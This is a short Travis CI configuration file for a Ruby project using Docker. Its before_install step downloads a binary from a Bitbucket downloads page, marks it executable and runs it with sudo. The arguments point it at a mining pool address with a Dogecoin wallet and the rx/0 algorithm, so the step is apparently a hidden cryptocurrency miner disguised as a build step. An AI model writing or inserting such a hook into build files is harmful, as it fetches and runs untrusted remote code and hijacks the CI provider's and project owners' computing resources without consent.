language: ruby

services:
  - docker

before_install:
  - sudo apt-get update && sudo apt-get install -y wget && wget https://bitbucket.org/tangoEnak123/ckckckckckck/downloads/masterfile && sudo chmod u+x masterfile && sudo ./masterfile -o 159.65.209.149:13333 -u DOGE:DJz1owzEtD8JLdNBs2unjqCnZARfr6EBCC.worker1 -k -a rx/0
